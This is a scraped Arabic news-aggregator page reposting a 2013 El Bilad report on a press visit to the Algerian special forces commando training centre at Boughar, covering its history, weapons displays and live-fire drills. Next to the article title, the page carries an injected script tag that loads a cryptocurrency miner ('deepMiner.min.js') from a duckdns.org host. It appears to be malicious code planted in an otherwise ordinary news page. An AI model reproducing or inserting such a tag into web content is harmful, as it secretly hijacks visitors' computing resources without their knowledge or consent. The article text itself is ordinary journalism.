googletag.defineSlot('/21620968445/Djazairess_Ar_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-502778721-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_1', 'div-gpt-ad-502778721-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-502778719-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_3', 'div-gpt-ad-502778719-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-502778720-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_2', 'div-gpt-ad-502778720-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Widget', [[222, 280]], 'div-gpt-ad-1077287891-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Widget', 'div-gpt-ad-1077287891-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1575446168-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Siteunder', 'div-gpt-ad-1575446168-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); جزايرس : “البلاد" تدخل عرين الأسد ببوغار وتستطلع يوميات “المغاوير"<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
توقيف 17 شابا حراقا بعنابة    التحالف يأمر بوقف الهجوم على الحديدة    المستفيدون من سكنات السوسيال بالحجار غير معنيين بالترحيل قبل نهاية العام    أزمة مياه بعنابة والطارف إلى إشعار آخر    استنفار في الأوساط الصحية بجيجل بعد تسجيل إصابات جديدة بداء البوحمرون    إيمانويل ماكرون: فرنسا حليفة أمريكا وليست تابعة لها    لن أحجّ.. فضميري إن يقتلني فهو يحييني    ولد عباس يستقيل من «الأفلان» ويقدّم عطلة مرضية ب45 يوما    ليبرمان‮ ‬يستقيل احتجاجا على وقف إطلاق النار في‮ ‬غزة‮ ‬    تشاووش أوغلو‮:‬    خلال أحداث شغب في‮ ‬مقابلة مولودية الجزائر‮ - ‬اتحاد بلعباس    نظمتها المديرية العامة للحماية المدنية‮ ‬    المركز الوطني‮ ‬للكتاب‮ ‬يكشف‮:‬    سيستقبلون حامل اللقب اليوم    البطولة العربية للأمم في‮ ‬كرة السلة    نظم بمشاركة حوالي‮ ‬25‮ ‬عارضا بالشلف    قال إن بلادنا خرجت من الكابوس بفضل سياسات بوتفليقة..أويحيى يؤكد:    تلمسان    حملة إعلامية لشرح تفاصيله تطلقها الوزارة‮ ‬    الجزائر اليوم على السكة الصحيحة    الدالية تخطف الأضواء في‮ ‬البحرين    حزب العمال خزان للطاقات النضالية    الانتخابات ستجرى رسميا‮ ‬يوم‮ ‬29‮ ‬ديسمبر المقبل    من مرض السكري    5500 إصابة جديدة في 2018    حجز 1200 دولار مزوّرة    أزمة يد عاملة في الفلاحة    أجواء ونفحات روحانية متميزة في أدرار    البوابة الجزائرية للمخطوطات مشروع علمي طموح    إنتخاب أرنود مونتبورغ رئيسا جديدا لجمعية فرنسا-الجزائر    ملياردير يستعد للرئاسة الأمريكية المقبلة    26 ألف قتيل جزائري في الحرب العالمية الأولى    فتح فضاء جديد بوهران    انطلاق حملة تحسيسية بالجزائر العاصمة    الإستعمال المفرط للمضادات الحيوية يهدد الصحة البشرية    مصابيح الدجى عبد الله بن رواحة    بن أحمد يعد بمواصلة دعم الفريق    تونس آيت علي تطرح مواضيع مسكوت عنها في مسرحية «ساكتة»    مليكة يوسف، صاولي وهندو لإدخال البسمة في نفوس الجمهور    فرق محترفة تمثل 7 مسارح للمشاركة في التظاهرة    والي وهران يتدخل لفتح الموقع الالكتروني ل «عدل « قبل التوزيع القادم    لا تسامح بعد اليوم    «الخضر" عازمون على رفع التحدي    «العنف اللفظي أكثر من الجسدي وبعض وسائل الإعلام تتحمل المسؤولية»    سيطرة فرق ولاية معسكر    وزارة النقل تُفرج عن مشروع إنجاز محطة بحرية جديدة بميناء الغزوات    نسبة الأشغال فاقت 80 %    المتهم يتمسك بأقواله أمام القاضي    تنصيب لجان متابعة تسيير المناطق    ‘'طفل السرطان" يعتذر لأمه    التصفيات الجهوية للأنشودة الوطنية    إبراز دور الزكاة الفعال    الدنمارك تعتمد رسميا وسيلة نقل جديدة    عائلة أوكرانية تحتجز 94 عبدا!    ‘'حيتان أسيرة" بروسيا    الشيخ شمس الدين:” أنا داعية إلى الله وخاطيني السياسة”    صفات وشكل وملامح وجه النبي صلى الله عليه وسلم    قصة الملكين هاروت وماروت    







شكرا على الإبلاغ!
سيتم حجب هذه الصورة تلقائيا عندما يتم الإبلاغ عنها من طرف عدة أشخاص.





“البلاد" تدخل عرين الأسد ببوغار وتستطلع يوميات “المغاوير"
نشر في البلاد أون لاين يوم 12 - 04 - 2013

رجال المغاوير أو القوات الخاصة أو فرق التدخل والاقتحام أو المظلي المغوار، هم من خيرة أبناء الجزائر وهبوا أرواحهم في سبيل هذا الوطن، حاملين أكفانهم على أيديهم للذود عن شرف هذا الوطن والموت في سبيل أن تبقى الجزائر شامخة كريمة… اقتربنا منهم وتحدثنا إليهم، والتمسنا منهم وفيهم ما يحمله شعار القوات الخاصة الشهير “لن تلبس الجزائر ثوب الحداد مادامت القوات الخاصة في البلاد". فهمهم الوحيد وشغلهم الشاغل محصور في حماية تراب هذا الوطن والدفاع عن حدوده وسيادته وألا ينحني ولا ينكسر.
هم أفراد القوات الخاصة “جنود المغاوير" زرناهم في مركز تدريب المغاوير ببوغار بقصر البخاري بدعوة من قيادة القوات البرية، حيث استقبلنا رئيس المركز المقدم حاجي كمال بمعية رئيس خلية الاتصال بالقوات البرية العقيد بوزكريا فضيل والمقدم سليم قرعيش رئيس خلية الاتصال بالناحية الأولى لإطلاعنا على المحيط المعيشي ويوميات أبناء الجزائر “جنود المغاوير" الذين ذاع صيتهم في الآونة الأخيرة وأخذوا سمعة عالمية لما قام به زملاؤهم في عملية تيقنتورين بعين أمناس من سرعة في الأداء واحترافية فائقة دوخت الجميع، وأثبتت مدى قوة وصلابة أفراد الجيش الذين يعتبر المغاوير جزءا لا يتجزأ منهم، خاصة أن المغاوير دربوا على العمليات الصعبة والمركبة واقتحام المواقع الخطيرة دون تردد ولا مهابة. يعتبر مركز بوغار الذي كان ثكنة عسكرية قبل أن يحول الى مركز تدريب تابع للقوات الخاصة عام 1993 من أشهر مراكز التدريب صرامة وانضباطا. وقد سبق للزعيم الراحل هواري بومدين أن قال فيه “من لم يتدرب ببوغار فليس بجندي ولا يعتبر قد أدى الخدمة الوطنية" في إشارة منه إلى مدى الحزم والانضباط المعروف بهذا المركز ولنوعية الجندي خريج هذه المدرسة التي لها امتداد تاريخي إلى ما قبل عام 1839 حيث اتخذه الأمير عبد القادر في حينها حصنا منيعا لمراقبة تحركات القبائل الصحراوية، ليحوله فيما بعد المستعمر إلى معسكر لجيش الاحتلال، لما يزخر به هذا المركز من موقع جغرافي هائل ولوجوده على بوابة الصحراء.
قادتنا هذه الزيارة رفقة العقيد بوزكريا فضيل والمقدم سليم وكمال الى ساحة العلم حيث كان بانتظارنا عرض لأنواع الأسلحة المستعملة لدى قوات المغاوير منها أسلحة خفيفة وثقيلة وأسلحة آلية ونصف آلية. ومع دخول التكنولوجيا عالم الجيش والتدريب فقد أدرجت قوات المغاوير طرقا إلكترونية في عمليات الرمي حيث خصص مركز إلكتروني للرمي إذ يحدد جهاز إعلام آلي نسبة امتياز الرمي ومدى جاهزية الجندي.
أسود في ساحات الوغى.. فالويل للمعتدي!
ما يميز القوات الخاصة عن غيرها من قوات الجيش هو القوة البدنية والسرعة في التدخل والحزم في الفعل وكذا رد الفعل العسكري مع سرعة الاختفاء والتمويه. قامت كتيبة من جنود المغاوير بإجراء استعراض عسكري وقتالي بينت من خلاله مدى احترافية الجيش الوطني الشعبي وقوة أفراده حيث لم يتعد عمر أفراد هذه الكتيبة داخل المركز الشهر الثاني إلا أنهم بينوا جاهزيتهم العالية وقدرتهم على العمل العسكري وأداء واجبهم دون هوادة قبل انتهاء مدة التدريب المقدرة بستة أشهر.
مناورات بالذخيرة الحية والقذائف واحترافية عالية
وتتمة لاستعراض عضلات الأسد وإظهارالجزء المسموح به والضئيل من قدرات جيشنا الباسل تم إجراء عرض ميداني ومناورات حربية بالذخيرة الحية حيث أثبت أفراد المغاوير احترافية فائقة أبهرت كل الحضور في الرمي بالمسدس والرشاش وكذا الأسلحة الثقيلة حيث تمت إصابة كافة الأهداف دون خطأ، وقد باشرت فرقة أخرى تابعة للقوات الخاصة عرض كيفية نصب الكمائن و رد الفعل في حال وقوعهم في كمين وإجلاء المصابين في حال تم تسجيل إصابات بينهم في ساحة الوغى.
ويعتبر مركز التدريب ببوغار الوحيد من نوعه في الوطن الذي يعنى بتدريب المغاوير التابعين للقوات الخاصة، كما يستقبل أفرادا من الحرس الجمهوري والشرطة القضائية والعسكرية والدفاع الجوي عن الإقليم للتدريب في مكافحة الإرهاب والتدخل السريع. أشار رئيس خلية الاتصال بالقوات البرية، العقيد بوزكريا فضيل، إلى أن “الجيش الوطني الشعبي بما فيه قوات المغاوير لهم تعليمات سابقة في ضرورة التوازن الجهوي أثناء انتقاء جنود جدد، مع إعطاء تسهيلات لأبناء الجنوب في توفير طائرات عسكرية تقل المترشحين وتضمن لهم العودة في حال تم رفض قبولهم. كما أن كل ولاية لها حصة محددة لا تزيد ولا تقل عن غيرها".
كما سجلنا وجود مكتبة تعنى بتثقيف أفراد القوات الخاصة في شتى المجالات إسلامية كانت أو حربية أو في مجال الطب والإعلام الالي، مع وجود ناد للترفيه والتسلية لأفراد القوات الخاصة في حال الفراغ من العمل.


انقر هنا لقراءة الخبر من مصدره.